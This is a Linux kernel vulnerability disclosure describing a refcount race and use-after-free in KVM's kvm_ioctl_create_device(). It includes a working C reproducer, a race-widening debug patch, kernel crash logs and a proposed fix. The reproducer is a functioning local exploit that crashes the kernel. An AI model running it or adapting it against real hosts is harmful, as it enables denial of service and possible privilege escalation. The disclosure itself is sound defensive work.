kvm_ioctl_create_device() contains the following code: dev = kzalloc(sizeof(*dev), GFP_KERNEL); if (!dev) return -ENOMEM; dev->ops = ops; dev->kvm = kvm; mutex_lock(&kvm->lock); ret = ops->create(dev, cd->type); if (ret < 0) { mutex_unlock(&kvm->lock); kfree(dev); return ret; } list_add(&dev->vm_node, &kvm->devices); mutex_unlock(&kvm->lock); if (ops->init) ops->init(dev); ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC); if (ret < 0) { mutex_lock(&kvm->lock); list_del(&dev->vm_node); mutex_unlock(&kvm->lock); ops->destroy(dev); return ret; } kvm_get_kvm(kvm); cd->fd = ret; This code: 1. creates a device that holds a reference to the VM object (with a borrowed reference, the VM's refcount has not been bumped yet) 2. initializes the device 3. transfers the reference to the device to the caller's file descriptor table 4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real reference The ownership transfer in step 3 must not happen before the reference to the VM becomes a proper, non-borrowed reference, which only happens in step 4. After step 3, an attacker can close the file descriptor and drop the borrowed reference, which can cause the refcount of the kvm object to drop to zero. Reproducer code: ================================= // run as `gcc -o kvm_fd_install kvm_fd_install.c -Wall -pthread && ./kvm_fd_install` #include #include #include #include #include #include #include static int predicted_fd = -1; static volatile int ready = 0; static void *do_close_predicted_fd(void *dummy) { ready = 1; while (1) close(predicted_fd); return NULL; /*unreachable*/ } int main(void) { int kvm = open("/dev/kvm", O_RDWR); if (kvm == -1) err(1, "open kvm"); int vm = ioctl(kvm, KVM_CREATE_VM, 0); if (vm < 0) err(1, "KVM_CREATE_VM"); predicted_fd = dup(0); if (predicted_fd == -1) err(1, "dup"); close(predicted_fd); pthread_t thread; if (pthread_create(&thread, NULL, do_close_predicted_fd, NULL)) errx(1, "pthread_create"); while (ready == 0) /*spin*/; struct kvm_create_device cd = { .type = KVM_DEV_TYPE_VFIO, .fd = -1, //outparm .flags = 0 }; if (ioctl(vm, KVM_CREATE_DEVICE, &cd)) err(1, "KVM_CREATE_DEVICE"); printf("created device: %d\n", cd.fd); } ================================= To reliably reproduce the issue, patch the kernel as follows to widen the race: ================================= diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c index 5ecea812cb6a..d43677044ec0 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c @@ -51,6 +51,7 @@ #include #include #include +#include #include #include @@ -2970,6 +2971,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm, bool test = cd->flags & KVM_CREATE_DEVICE_TEST; int ret; + pr_warn("kvm_ioctl_create_device: entry: refcount=%u\n", refcount_read(&kvm->users_count)); + if (cd->type >= ARRAY_SIZE(kvm_device_ops_table)) return -ENODEV; @@ -3000,6 +3003,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm, if (ops->init) ops->init(dev); + pr_warn("kvm_ioctl_create_device: before anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count)); + ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC); if (ret < 0) { mutex_lock(&kvm->lock); @@ -3009,8 +3014,13 @@ static int kvm_ioctl_create_device(struct kvm *kvm, return ret; } + pr_warn("kvm_ioctl_create_device: after anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count)); + msleep(100); + pr_warn("kvm_ioctl_create_device: after sleeping: refcount=%u\n", refcount_read(&kvm->users_count)); + kvm_get_kvm(kvm); cd->fd = ret; + pr_warn("kvm_ioctl_create_device: exiting: refcount=%u\n", refcount_read(&kvm->users_count)); return 0; } ================================= splat in a patched kernel: ================================= [ 224.536858] kvm_ioctl_create_device: entry: refcount=1 [ 224.539410] kvm_ioctl_create_device: before anon_inode_getfd: refcount=1 [ 224.541542] kvm_ioctl_create_device: after anon_inode_getfd: refcount=1 [ 224.651860] BUG: unable to handle kernel paging request at ffffc900015deb08 [ 224.653744] #PF error: [normal kernel read fault] [ 224.655032] PGD 1ead35067 P4D 1ead35067 PUD 1eaeb6067 PMD 1e2c46067 PTE 0 [ 224.656834] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN [ 224.658364] CPU: 0 PID: 1155 Comm: kvm_fd_install Not tainted 5.0.0-rc3+ #251 [ 224.660252] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 224.662551] RIP: 0010:kvm_vm_ioctl+0xd75/0xdd0 [ 224.663746] Code: c7 c7 a0 f3 a0 a8 e8 53 fa 21 00 bf 64 00 00 00 e8 a0 e5 24 00 be 04 00 00 00 4c 89 ef e8 03 ba 42 00 4c 89 ef e8 cb d8 42 00 <8b> b5 08 9b 00 00 48 c7 c7 00 f4 a0 a8 e8 22 fa 21 00 48 89 ef e8 [ 224.668662] RSP: 0018:ffff8881e3c3f988 EFLAGS: 00010246 [ 224.670057] RAX: 0000000000000000 RBX: 1ffff1103c787f36 RCX: ffffffffa6a2c325 [ 224.671950] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffffc900015deb08 [ 224.673835] RBP: ffffc900015d5000 R08: fffff520002bbd62 R09: fffff520002bbd62 [ 224.675731] R10: 0000000000000001 R11: fffff520002bbd61 R12: ffff8881d65863e0 [ 224.677615] R13: ffffc900015deb08 R14: ffff8881d65863c8 R15: ffffffffa9653bc0 [ 224.679506] FS: 00007f11f9500700(0000) GS:ffff8881eb000000(0000) knlGS:0000000000000000 [ 224.681643] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 224.684886] CR2: ffffc900015deb08 CR3: 00000001dfc20003 CR4: 00000000003606f0 [ 224.686788] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 224.688674] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 224.690565] Call Trace: [...] [ 224.721351] do_vfs_ioctl+0x134/0x8f0 [...] [ 224.732860] ksys_ioctl+0x70/0x80 [ 224.733749] __x64_sys_ioctl+0x3d/0x50 [ 224.734764] do_syscall_64+0x73/0x160 [ 224.735743] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 224.737092] RIP: 0033:0x7f11f8e21dd7 [ 224.738048] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48 [ 224.742945] RSP: 002b:00007ffeb6611e58 EFLAGS: 00000202 ORIG_RAX: 0000000000000010 [ 224.744932] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f11f8e21dd7 [ 224.746810] RDX: 00007ffeb6611e64 RSI: 00000000c00caee0 RDI: 0000000000000004 [ 224.748681] RBP: 00007ffeb6611e80 R08: 00007f11f8d40700 R09: 00007f11f8d40700 [ 224.750556] R10: 00007f11f8d409d0 R11: 0000000000000202 R12: 0000564cddd8a7b0 [ 224.752433] R13: 00007ffeb6611f60 R14: 0000000000000000 R15: 0000000000000000 [ 224.754311] Modules linked in: btrfs xor zstd_compress raid6_pq [ 224.755904] CR2: ffffc900015deb08 [ 224.756792] ---[ end trace 670d8a6b1c3ab210 ]--- ================================= Without the patch, I can still crash a Debian stable distro kernel by running the reproducer in a loop (`while true; do ./kvm_fd_install; done`), but it takes a while to trigger: ================================= [ 251.054762] BUG: unable to handle kernel NULL pointer dereference at 00000000000000a8 [ 251.057734] IP: [] down_write+0x1b/0x40 [ 251.059903] PGD 0 [ 251.061455] Oops: 0002 [#1] SMP [ 251.062661] Modules linked in: ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack br_netfilter bridge stp llc aufs(O) overlay snd_hda_codec_generic kvm_intel snd_hda_intel qxl kvm ttm irqbypass crct10dif_pclmul crc32_pclmul ghash_clmulni_intel drm_kms_helper snd_hda_codec snd_hda_core joydev virtio_balloon snd_hwdep evdev sg snd_pcm 9pnet_virtio serio_raw snd_timer snd button virtio_console binfmt_misc soundcore pcspkr drm 9p 9pnet fscache ip_tables x_tables autofs4 ext4 crc16 jbd2 fscrypto ecb mbcache btrfs crc32c_generic xor hid_generic usbhid hid raid6_pq sr_mod cdrom ata_generic virtio_blk virtio_net crc32c_intel ata_piix aesni_intel uhci_hcd [ 251.085764] ehci_pci aes_x86_64 ehci_hcd glue_helper libata lrw gf128mul ablk_helper psmouse i2c_piix4 cryptd virtio_pci usbcore virtio_ring usb_common scsi_mod virtio floppy [ 251.090094] CPU: 4 PID: 6392 Comm: kvm_fd_install Tainted: G O 4.9.0-8-amd64 #1 Debian 4.9.130-2 [ 251.092751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 251.094947] task: ffff949b676f10c0 task.stack: ffffb79691840000 [ 251.096524] RIP: 0010:[] [] down_write+0x1b/0x40 [ 251.098605] RSP: 0018:ffffb79691843bf0 EFLAGS: 00010246 [ 251.100029] RAX: 00000000000000a8 RBX: 00000000000000a8 RCX: ffffb79691843c28 [ 251.101904] RDX: ffffffff00000001 RSI: 0000000000000286 RDI: 00000000000000a8 [ 251.103786] RBP: ffff949b4650b1d8 R08: 0000000000000000 R09: 0000000000000000 [ 251.105659] R10: ffff949b66a84510 R11: ffffdb9787f9bf80 R12: ffff949b4650b220 [ 251.107556] R13: ffff949b4650b180 R14: ffffffff96310034 R15: ffff949b4650b180 [ 251.109423] FS: 0000000000000000(0000) GS:ffff949b73d00000(0000) knlGS:0000000000000000 [ 251.111560] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 251.113081] CR2: 00000000000000a8 CR3: 00000001cf808000 CR4: 0000000000360670 [ 251.114956] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 251.116847] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 251.118718] Stack: [ 251.119277] ffff949b67cc0000 ffffffff956933f1 ffffb79691843c00 ffff949b67cc0000 [ 251.122232] ffff949b67cc0000 ffff949b69ce4b68 ffff949b6a624060 ffff949b693cd740 [ 251.124294] ffff949b69ce4b68 ffffffffc07410b2 ffff949b67cc0000 0000000000000008 [ 251.126345] Call Trace: [ 251.127015] [] ? debugfs_remove_recursive+0x51/0x1c0 [ 251.128780] [] ? kvm_put_kvm+0x32/0x1d0 [kvm] [ 251.130366] [] ? kvm_vm_release+0x1d/0x30 [kvm] [ 251.132000] [] ? __fput+0xd8/0x220 [ 251.133327] [] ? task_work_run+0x7f/0xa0 [ 251.134790] [] ? do_exit+0x2d5/0xaf0 [ 251.136163] [] ? do_group_exit+0x3a/0xa0 [ 251.137618] [] ? get_signal+0x299/0x640 [ 251.139056] [] ? do_signal+0x36/0x6a0 [ 251.140458] [] ? kvm_arch_hardware_disable+0x15/0x40 [kvm] [ 251.142324] [] ? __fput+0x17d/0x220 [ 251.143687] [] ? task_work_run+0x84/0xa0 [ 251.145156] [] ? exit_to_usermode_loop+0x71/0xb0 [ 251.146794] [] ? do_syscall_64+0xdd/0xf0 [ 251.148261] [] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6 [ 251.150074] Code: 01 74 08 48 c7 43 20 01 00 00 00 5b c3 0f 1f 00 0f 1f 44 00 00 53 48 89 fb e8 b2 df ff ff 48 ba 01 00 00 00 ff ff ff ff 48 89 d8 48 0f c1 10 85 d2 74 05 e8 17 be d2 ff 65 48 8b 04 25 c0 fb [ 251.157011] RIP [] down_write+0x1b/0x40 [ 251.158480] RSP [ 251.159418] CR2: 00000000000000a8 [ 251.160300] ---[ end trace b3803036d037ea83 ]--- [ 251.161513] Fixing recursive fault but reboot is needed! ================================= I have requested a CVE identifier from MITRE, but haven't heard back yet. I am attaching a suggested patch; here's an inline copy for review (with clobbered whitespace): =========================================== From 7396c501baf3f066c05a74c790775c2c686be8a7 Mon Sep 17 00:00:00 2001 From: Jann Horn Date: Sat, 26 Jan 2019 01:19:40 +0100 Subject: [PATCH] kvm: fix temporary refcount drop in kvm_ioctl_create_device() As soon as we call anon_inode_getfd(), userspace can close the device, causing a kvm_put_kvm() call that drops a reference. This means that we need to grab a reference for the device before anon_inode_getfd(), otherwise the VM can disappear from under us. Fixes: 852b6d57dc7f ("kvm: add device control API") Cc: stable@kernel.org Signed-off-by: Jann Horn --- virt/kvm/kvm_main.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c index 5ecea812cb6a..585845203db8 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c @@ -3000,8 +3000,10 @@ static int kvm_ioctl_create_device(struct kvm *kvm, if (ops->init) ops->init(dev); + kvm_get_kvm(kvm); ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC); if (ret < 0) { + kvm_put_kvm(kvm); mutex_lock(&kvm->lock); list_del(&dev->vm_node); mutex_unlock(&kvm->lock); @@ -3009,7 +3011,6 @@ static int kvm_ioctl_create_device(struct kvm *kvm, return ret; } - kvm_get_kvm(kvm); cd->fd = ret; return 0; } -- 2.20.1.495.gaa96b0ce6b-goog ===========================================